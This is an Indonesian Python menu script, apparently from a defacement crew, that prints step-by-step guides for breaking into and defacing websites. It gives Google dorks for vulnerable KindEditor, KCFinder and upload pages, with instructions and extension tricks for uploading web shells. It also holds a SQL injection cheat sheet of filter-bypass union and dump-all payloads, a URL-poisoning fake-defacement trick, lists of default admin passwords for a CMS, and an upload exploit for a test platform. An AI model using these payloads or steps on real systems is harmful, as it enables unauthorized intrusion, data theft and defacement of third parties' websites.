#uler python:v
#recode?malu tolol
import time
import os
import sys

b = '\033[34;1m'
g = '\033[32;1m'
p = '\033[35;1m'
c = '\033[36;1m'
r = '\033[31;1m'
w = '\033[37;1m'
y = '\033[33;1m'


print ('\033[31;1m[-------------------Tools Depes----------------]')
print ('\033[37;1m[               Author : Insan Gans            ]')
print ('\033[31;1m[             Team : FRI3NDS CYBER ARMY        ]')
print ('\033[37;1m[             Contact Me : 081212683289        ]')
print ('\033[31;1m[----------------------------------------------]')
print('')

print('\033[33;1mEnjoy With Tools Njeng')
time.sleep(2)


menu = '''
{1}Kindeditor

{2}Mata Batin

{3}Kcfinder Up Shell

{4}Kumpulan String Sql Injection Manual

{5}Depes Url Poisoning

{6}Admin Weak Pass CMS VMSBUSINESS

{7}CBT

{99}Kirim Pesan Ke Busted/InsanGans'''
time.sleep(1)

print('')
print (menu)
insangans = input('Silahkan Pilih Tod :')
print ('')
time.sleep(1)

if insangans =='1':
      print('\033[33;1mYang Pertama Siapin Dulu Bahan-bahannya')
      time.sleep(1)
      print('Dork : inurl:examples/uploadbutton.html')
      time.sleep(1)
      print('Kalau Sudah Dorking Pilih Salah Satu Web Nya Njeng')
      time.sleep(1)
      print('Kalo Udah Dapet Web Nya Klik Tulisan "upload"')
      time.sleep(2)
      print('Lalu Pilih Script Depes Kesayangan Kalian')
      time.sleep(2)
      print('Nah Nanti Kalo Berhasil Muncul Link Akses Nya Tinggal Kalian Copas Aja Deh Gampang Kan?')
      time.sleep(4)
      print('See You Next Time Syg Bye,,,,,')
      time.sleep(5)


elif insangans =='2':
      print('Langsung Ngedork Aja ya babi')
      time.sleep(1)
      print('dork: inurl:up.php intext:Upload Site:co.il')
      print('intext:index of upload.phtml')
      print('intext:index of uploader.php.fla')
      time.sleep(3)
      print('Kembangin Lagi Biar Dapet Yang Fresh')
      time.sleep(2)
      print('Kalo Udah Dapet Yang Vuln Langsung Aja Cari tulisan upload lalu klik Dan Pilih Shell Atau script depes kesayangan kalian')
      time.sleep(6)
      print('Gatau Cara Akses Nya?www.site.com/[path]/namascript.html atau')
      print('www.site.com/namascript.php')
      time.sleep(6)
      print('easy kan?Iya donggg Semoga Berhasil Ya Beb Unchh')
      time.sleep(2)
      print('See You Next Time Syg Bye,,,,,,')
      time.sleep(3)

elif insangans =='3':
      print('\033[33;1mBiasa Kita Dorking Dulu Tod')
      time.sleep(2)
      print('Dork : inurl:/kcfinder/browse.php')
      print('lib/kcfinder/files/upload')
      print('admin/kcfinder/files/upload/')
      print('/panel/kcfinder/upload/files')
      print('editor/kcfinder/upload')
      print('Kcfinder/upload/files')
      time.sleep(9)
      print('Kembangin Lagi Mek Dork Nya')
      time.sleep(4)
      print('Exploit Nya : /browser.php  contoh www.site.com/browser.php')
      time.sleep(3)
      print('Ekstensi Shell Yang Bisa Di Upload: .php.fla .php6 .php3 .php5')
      time.sleep(4)
      print('Semoga Berhasil')
      time.sleep(1)
      print ('See You N3xt Time Syg Bye,,,,')

elif insangans =='4':
      print('Hey Wassap Kali Ini  Gw mau ngeshare String Sql Oke Simak Ya anjg')
      print('1.String For Website Vuln Sql Injection')
      print('')
      time.sleep(1)
      print("'--+ dan '+--+ dan ')-- dan ')--+ dan ')+--+ dan '))--+")
      time.sleep(5)
      print('')
      print('2.Searching In Inject Point')
      time.sleep(1)
      print('')
      print('order+by')
      print('group+by')
      print('order/**/by')
      print('order/**_**/by')
      print('/*!42247order*//**//*!42247by*/')
      print('%0aorder%0aby%0a')
      time.sleep(5)
      print('')
      print('3.Union Select For Number at database')
      print('')
      time.sleep(3)
      print('union+select')
      print('union/**/select')
      print('union/**_**/select')
      print('id=1.unioN/**/distinct%20%73eleCt""a')
      print('id=1%.0unioN/**/distinct%20%73eleCt+-!~')
      print('id=1%""unioN/**/distinct%20%73eleCt@$%')
      print('id=1%''unioN/**/distinct%20%73eleCt@%C0%')
      time.sleep(4)
      print('')
      print('Contoh Nya Su :')
      print('id=1.unioN/**/distinct%73eleCt""a1,2,3``from.%20users``limit0,1---')
      print('id=1%.0unioN/**/distinct%73eleCt+-!~a1,2,3|''from%20.users-- -')
      print('id=1%""unioN/**/distinct%73eleCt@$%a1,2,3|""fromusers-- -')
      print('id=1%''unioN/**/distinct%73eleCt@%C0%a1,2,3^""fromusers-- -')
      print('')
      time.sleep(15)
      print('4.And False or And True')
      time.sleep(3)
      print('')
      print('and+0')
      print('div+0')
      print('and+false')
      print('having+0')
      print('having+1=0')
      print('and+1=0')
      print('limit0')
      print('"and(1)=(1')
      print('where1/*!=*/2')
      time.sleep(10)
      print('')
      print('5.Dumb With Dios')
      print('')
      time.sleep(1)
      print('concat_ws(0x3c62723e,0x415a5a41545353494e53,schema(),version(),user(),(select')
      print('(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(tabl')
      print('e_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a')
      print('3a20,column_name))))x))')
      print('')
      print('concat_ws/**/(0x3c62723e,0x415a5a41545353494e53,database/**/(),version/**/(),')
      print('user/**/(),(select%20concat/**/(@AZZATSSINS:=0x00,if((select%20count(*)%20/*!4')
      print('')
      print('2247from*/%20/*!42247information_schema*/.columns%20/*!42247where*/%20/*!')
      print('42247table_schema*/%20not%20like%200x696e666f726d6174696f6e5f736368656')
      print('d61%20and%20@AZZATSSINS:=concat/**/(@AZZATSSINS,0x3c62723e,/*!42247ta')
      print('ble_name*/,0x3a,/*!42247column_name*/)),0x00,0x00),@AZZATSSINS)))')
      print('')
      print('make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_s')
      print('et(511,@,0x3c6c693e,table_name,column_name)),@)')
      print('')
      print('replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x243')
      print('c62723e253c62723e3c666f6e7420636f6c6f723d7265643e263c2f666f6e743e3c6')
      print('2723e3c666f6e7420636f6c6f723d707572706c653e273c2f666f6e743e3c666f6e7')
      print('420636f6c6f723d7265643e,0x24,0x3c62723e3c62723e3c666f6e7420636f6c6f72')
      print('3d677265656e3e415a5a41545353494e532057415320484552453c2f666f6e743e3')
      print('c666f6e7420636f6c6f723d626c75653e),0x25,version()),0x26,database()),0x27,use')
      print('r())),0x24,(select+count(*)+from+information_schema.columns+where+table_sche')
      print('ma=database()+and@:=replace(replace(0x003c62723e2a,0x00,@),0x2a,table_nam')
      print('e))),0x25,@)')
      print('')
      print('6.Bypass Convert')
      print('*convert(concat(schema()+using+ascii)')
      print('ujis')
      print('ucs2')
      print('tis620')
      print('swe7')
      print('sjis')
      print('macroman')
      print('macce')
      print('latin7')
      print('latin5')
      print('latin2')
      print('koi8u')
      print('koi8r')
      print('keybcs2')
      print('hp8')
      print('geostd8')
      print('gbk')
      print('gb2132')
      print('armscii8')
      print('ascii')
      print('binary')
      print('cp1250')
      print('big5')
      print('cp125')
      print('cp1256')
      print('cp1257')
      print('cp850')
      time.sleep(5)
      print('')
      print('Semoga Berhasil Syg')
      print('See You Next Time Syg Bye,,,,,')


elif insangans =='5':
      print('Depes Untuk Bangsa Mager:\/')
      time.sleep(2)
      print('')
      print('kaya biasa dorking dulu')
      print('Dork : site:ua "plugins editors jce tiny mce plugins cfg contactform"')
      time.sleep(3)
      print('Kalo Udah Pikih Salah Satu Web Nya Lalu Hapus Bagian Belajang Sampai site nya')
      time.sleep(2)
      print('Contoh: sebelum http://www.autoguma.com.ua/wp-content/plugins/mw-wp-form/readme.txt')
      time.sleep(2)
      print('ubah jadi seperti ini http://www.autoguma.com.ua/Heked+by+InsanGans')
      time.sleep(2)
      print('Easy Kan')
      print('See You Next Time Syg Bye,,,,,,')


elif insangans =='6':
      print('Kek Biasa Mek Kita Dorking Dolo')
      time.sleep(1)
      print('intext:Please Login to administrative console inurl:/admin/upload/ site:in')
      print('inurl:/admin/upload')
      print('inurl:/admin/includes/ site:in')
      print('inurl:/admin/login.php intext:WEB@VMSBUSINESS.COM')
      time.sleep(1)
      print('')
      print('Nah Kalo Udah Langsung Masukin Username Sama Pw Nya')
      time.sleep(2)
      print('')
      print('user : admin')
      print('password : admin')
      print('user : admin')
      print('password : sysadmin')
      print('user : admin')
      print('password : admin123')
      print('user : admin')
      print('password : 12345678')
      print('user : admin')
      print('password : adminweb')
      print('user : sysadmin')
      print('password : adminpanel')
      print('user : adminpanel')
      print('password : adminpanel')
      print('user : masterweb')
      print('password : masterweb')
      print('user : admin123')
      print('password : admin123')
      print('user : root')
      print('password : webadmin')
      time.sleep(2)
      print('')
      print('Nah Kalo Udah Berhasil Masuk Tinggal Kalian Otak Atik Web Nya')
      time.sleep(2)
      print('See you Next Time Syg Bye,,,,,')

elif insangans =='7':
      print('Kek Biasa Kita Dorking Dulu')
      time.sleep(1)
      print('')
      print('inurl:/panel/pages/login.php')
      time.sleep(1)
      print('')
      print('exploit nya site.com/aksi/uploadfile.php atau site.com/aksi/upload-file.php')
      time.sleep(1)
      print('')
      print('Kalo Blank You know Lah:) Artunya Vuln Kalian Tinggal Ke csrf online aja ga punya?Google Banyak csrf online jgn mau disuapin mulu njeng')
      time.sleep(1)
      print('')
      print('untuk Post File Nya : uploadfile(sesuai bug nya tod)')
      time.sleep(1)
      print('gtau akses nya? site.com/images/namascriplo.php')
      time.sleep(1)
      print('')
      print('Mudah Kan?Semoga Berhasil Yah:)')
      print('See You Next Time Syg Bye,,,,,')
      time.sleep(3)



elif insangans =='99':
      print('Silahkan Kirim Pesan : ')
      time.sleep(1)
      os.system("termux-open-url https://wa.me/+6281212683289?text=Halo%20Insan%20Yang%20Ganteng%20Boleh%20Kenalan%20Gak?")


else :
   print('Wrong Input Njeng!!!')
